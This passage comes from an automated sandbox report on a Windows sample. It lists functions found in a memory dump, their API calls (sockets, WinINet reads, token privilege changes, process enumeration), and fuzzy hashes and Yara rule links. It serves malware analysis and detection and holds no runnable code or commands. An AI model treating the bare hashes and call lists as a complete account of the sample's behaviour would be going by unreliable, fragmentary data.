Instruction ID: 038ac65b38a94200dc1f3b96a98f1125f971182c8deafdf183343aec46fc546c
Opcode Fuzzy Hash: 38e0a8110fe8d1c6f6e9ab5578f7efccfe1a675cd0d216b921dc3022918970b4
Instruction Fuzzy Hash: 9E21A0316002059FCB10EF68C985BBEB7E9EF49720F6441A9E916E73E1CB70AD41CB51

Function 00B25520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00B30DB6: std::exception::exception.LIBCMT ref: 00B30DEC
Part of subcall function 00B30DB6: __CxxThrowException@8.LIBCMT ref: 00B30E01

_memmove.LIBCMT ref: 00B60258
_memmove.LIBCMT ref: 00B6036D
_memmove.LIBCMT ref: 00B60414

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 01c066cf34db61a0115fe56270cd9d31aaa1ed8a4544fbfb9428bb1356ca048a
Instruction ID: 37a1f460e490cb118a9622df7e2318c6f775977d7f06eb6b1b975a15370bf3cf
Opcode Fuzzy Hash: 01c066cf34db61a0115fe56270cd9d31aaa1ed8a4544fbfb9428bb1356ca048a
Instruction Fuzzy Hash: AC02CE70A10219DBCF14EF65D891AAEBBF5FF48300F6480A9E80ADB355EB35D950CB91

Function 00B11287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00B12612: GetWindowLongW.USER32(?,000000EB), ref: 00B12623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00B119FA
GetSysColor.USER32(0000000F), ref: 00B11A4E
SetBkColor.GDI32(?,00000000), ref: 00B11A61

Part of subcall function 00B11290: DefDlgProcW.USER32(?,00000020,?), ref: 00B112D8

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 5eb942d783b5d5116b4b9eda7b37e3023d09c445c1fe80918a5c2becb2661745
Instruction ID: eee173fa8f49ac50e35f002f06ea7faeab320d3d8adcf00af8e090d8c8541ee4
Opcode Fuzzy Hash: 5eb942d783b5d5116b4b9eda7b37e3023d09c445c1fe80918a5c2becb2661745
Instruction Fuzzy Hash: AFA18E71126545BAEB389B2C4C84DFF3EDCDF41381B9409DAF722D2192DE25DE81A2B1

Function 00B86747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B87D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B87DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00B8679E
WSAGetLastError.WSOCK32(00000000), ref: 00B867C7
bind.WSOCK32(00000000,?,00000010), ref: 00B86800
WSAGetLastError.WSOCK32(00000000), ref: 00B8680D
closesocket.WSOCK32(00000000,00000000), ref: 00B86821

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: c464730ef2a2e702e555a46a3f79eb2e8217eec7f25594d2c71d34b16c430a7b
Instruction ID: f66839d65f22499097a6414d082878efc9b0cc86d603cd05680d623fd5870bdc
Opcode Fuzzy Hash: c464730ef2a2e702e555a46a3f79eb2e8217eec7f25594d2c71d34b16c430a7b
Instruction Fuzzy Hash: E641E575A00200AFDB10BF648C96FBE77E8EF05764F4484ACF919AB3D2CA749E418791

Function 00B95376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00B953C5
IsWindowEnabled.USER32 ref: 00B953D3
GetForegroundWindow.USER32(?,?,00000001), ref: 00B953E0
IsIconic.USER32 ref: 00B953EE
IsZoomed.USER32 ref: 00B953FC

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: b6d0eef712977e7a1aa676fdbf92caaf597ea192706991327b7dd1811c3a570d
Instruction ID: 5ce0a59e7a785cdf2ce585198cb1cd66c94cbca11c4711417288da7eefb4b395
Opcode Fuzzy Hash: b6d0eef712977e7a1aa676fdbf92caaf597ea192706991327b7dd1811c3a570d
Instruction Fuzzy Hash: 1F11B2317449116BEF325F269C44A6A7BD8EF457A1B5140B9F846D3241CBB0DC41C7A4

Function 00B680A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B680C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B680CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B680D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B680E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B680F6

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 8977f90127642ef7b57fd418e0c8ce8d87a786cd32d6fe857b32834ad319a995
Instruction ID: 03bc88c3ade1a7b7ffd4af6b41bb81689ec34d7956d2c5fa3cc254caa1ce8ab5
Opcode Fuzzy Hash: 8977f90127642ef7b57fd418e0c8ce8d87a786cd32d6fe857b32834ad319a995
Instruction Fuzzy Hash: 71F06231240215BFEB100FA5EC8EE7B3BACEF4A765B100166F945D7160CF659C42DA60

Function 00B14B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00B14AD0), ref: 00B14B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B14B57

Strings

GetNativeSystemInfo, xrefs: 00B14B51
kernel32.dll, xrefs: 00B14B40

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 2c0f0f05d4f232a6cbd3c56dda40f5df04f658dd666ba570f91ec60704756062
Instruction ID: 1437ee32e65c1936d26c08ec88d35a0900f032df0aa10a4a7336e2ebf1b1e7b8
Opcode Fuzzy Hash: 2c0f0f05d4f232a6cbd3c56dda40f5df04f658dd666ba570f91ec60704756062
Instruction Fuzzy Hash: EBD01274A10723CFDB209F31E958B5676E4EF05361B15C87A9485D6160DB70D4C0C654

Function 00B23030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 41ff3fa5c5ff5e0ae7bb5c323e0d490ef1b285c6d20e152bc5dc74a007836715
Instruction ID: 5a6847795d2cb549c4b4faf21352b025b45cc7d0f4b24cd02c56f1cf93e6c341
Opcode Fuzzy Hash: 41ff3fa5c5ff5e0ae7bb5c323e0d490ef1b285c6d20e152bc5dc74a007836715
Instruction Fuzzy Hash: 0D22BB716083109FC724EF14D891BAEB7E4EF84710F5049ADF89A97391DB34EA49CB92

Function 00B8EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00B8EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 00B8EE4B

Part of subcall function 00B17DE1: _memmove.LIBCMT ref: 00B17E22

Process32NextW.KERNEL32(00000000,?), ref: 00B8EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00B8EF1A

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 7330103a57a8e02d8b1e1a17327a163435c56e746b1739e17a27b4d0d8e3c7ca
Instruction ID: c8fd86deb0b89d054693099fcd17aa08b6ae2a4d01bed87b525b41dbc3cd0c2b
Opcode Fuzzy Hash: 7330103a57a8e02d8b1e1a17327a163435c56e746b1739e17a27b4d0d8e3c7ca
Instruction Fuzzy Hash: 8B518E71508311AFD320EF20DC85EABB7E8EF98750F50486DF595972A1EB70E948CB92

Function 00B6E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00B6E628

Strings

|, xrefs: 00B6E658
(, xrefs: 00B6E66E

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 96ccd2f9f2f464a79b7ef6a0582ed9a6310075915fa4b2072f27f0bf8ab42fd4
Instruction ID: c722b8415c53ada4f784773304c7c75a71f3302af194e23dc58821b8be917dba
Opcode Fuzzy Hash: 96ccd2f9f2f464a79b7ef6a0582ed9a6310075915fa4b2072f27f0bf8ab42fd4
Instruction Fuzzy Hash: BD323779A007059FDB28CF59C48196AB7F1FF48310B15C4AEE8AADB3A1E774E941CB40

Function 00B822EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00B8180A,00000000), ref: 00B823E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00B82418

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 2750073862af3592eea59407e7bbffb27e9829a5b903d4eafd9840df1c247201
Instruction ID: 5294ef686c8462d9130ed8dfeb3017381f771b3fb29e7980f9ebfe8d1e6dc0e1
Opcode Fuzzy Hash: 2750073862af3592eea59407e7bbffb27e9829a5b903d4eafd9840df1c247201
Instruction Fuzzy Hash: 7C41C571A04209BFEB20EF95DC95EBBB7FCEB40324F1440AAF601A7260DA759E41D764

Function 00B7B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B7B40B
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00B7B465
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00B7B4B2

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: f6bd9706496594d4894c17a9a1c389a9cbaa31b962b33861ddc86678b0f49dbc
Instruction ID: 6f262b86f13eb9fba1b762ccefd176767db739696ff5b6b2f1228cd4f44a4804
Opcode Fuzzy Hash: f6bd9706496594d4894c17a9a1c389a9cbaa31b962b33861ddc86678b0f49dbc
Instruction Fuzzy Hash: A3214A35A00118EFCB00EFA5D884AEDBBF8FF49310F1480AAE905EB361CB319955CB51

Function 00B687E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00B30DB6: std::exception::exception.LIBCMT ref: 00B30DEC
Part of subcall function 00B30DB6: __CxxThrowException@8.LIBCMT ref: 00B30E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B6882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B68858
GetLastError.KERNEL32 ref: 00B68865

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: aa7c980a79ad6cac53f65f5a0fd297a41a853d897cd2f0d0f1163196578b5ee9
Instruction ID: 3f227b29b7368150b6f9ebd62e0cce814626266de3c0b3f76e51de6574c4e618
Opcode Fuzzy Hash: aa7c980a79ad6cac53f65f5a0fd297a41a853d897cd2f0d0f1163196578b5ee9
Instruction Fuzzy Hash: 89116AB2914205AFE718EFA4DC85D6BB7ECEB44720B20866EE45697241EE74AC408B60

Function 00B6874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00B68774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B6878B
FreeSid.ADVAPI32(?), ref: 00B6879B

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 0e3c6104f2aff150bfbee3d28510f8fa130098968fafe5007466fd80da320b82
Instruction ID: cbe61358482f0f260d1935bb153afb1e1c54e863206c1fb8b697cb3e1db80d7b
Opcode Fuzzy Hash: 0e3c6104f2aff150bfbee3d28510f8fa130098968fafe5007466fd80da320b82
Instruction Fuzzy Hash: 6BF04975A1130DBFDF00DFF4DD89ABEBBBCEF08211F1045A9A901E3181EA756A048B50

Function 00B7C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B7C6FB
FindClose.KERNEL32(00000000), ref: 00B7C72B

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 66854a92c28a3f8f77812c0be788b31831628762180e25f1ddffe58f7c09b3a6
Instruction ID: 92d51dfec9a15bd2532abdc51bf4d38cd94ddab67e7eff135e8d1e8a7f66f831
Opcode Fuzzy Hash: 66854a92c28a3f8f77812c0be788b31831628762180e25f1ddffe58f7c09b3a6
Instruction Fuzzy Hash: FA118E726002049FDB10EF29D895A6AF7E9FF85360F00855EF8A9C7290DB30ED01CB81

Function 00B7A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00B89468,?,00B9FB84,?), ref: 00B7A097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00B89468,?,00B9FB84,?), ref: 00B7A0A9

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: a09bbfa2af058c6443827eea53aa6688e48cc59cc70985c03887af45d5872637
Instruction ID: 958df2de78b4dd8644f8940d7616f54dde19646449f21bfbb8a9ded987815bd7
Opcode Fuzzy Hash: a09bbfa2af058c6443827eea53aa6688e48cc59cc70985c03887af45d5872637
Instruction Fuzzy Hash: 21F05E3554922DBADB619FA4DC48FEA77ACBF08361F0085A6F919D7181DA309A40CBA1

Function 00B681CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B68309), ref: 00B681E0
CloseHandle.KERNEL32(?,?,00B68309), ref: 00B681F2

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 712cb4d58d35f6d49ae2a919f6ab74e6c8f92fe84b0ad4e1b2b924c0c327c00c
Instruction ID: c592712eb5993ac059852cae7fd4a7aaeb480f2012b16cf0f8190cfab8a7dd42
Opcode Fuzzy Hash: 712cb4d58d35f6d49ae2a919f6ab74e6c8f92fe84b0ad4e1b2b924c0c327c00c
Instruction Fuzzy Hash: DEE0BF71014521AFE7253B60EC09D7777EDEF04320B248969B465C5470DB625C91DB14

Function 00B3A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00B38D57,?,?,?,00000001), ref: 00B3A15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00B3A163

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 34db4b2a24410c99576d59fce2880c6fd09d1c7a879a36809f7288852da18e47
Instruction ID: fc3cfe6f83bc9353b2479bf952e95f3d269be20be8902a80ad98d14cef7df4a8
Opcode Fuzzy Hash: 34db4b2a24410c99576d59fce2880c6fd09d1c7a879a36809f7288852da18e47
Instruction Fuzzy Hash: 46B0923105820AEBCA002BA1ED09BA83F68EB44BB2F404022F60DC6062CF6654A08A99

Function 00B3F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d782353a21941df3ebec7f0d625ae6d720ce3b0fafe4611423019a000ca7855
Instruction ID: 8662813be958346aca0eee107a799636e2500dde5219b29d7e52e833cdebd51c
Opcode Fuzzy Hash: 2d782353a21941df3ebec7f0d625ae6d720ce3b0fafe4611423019a000ca7855
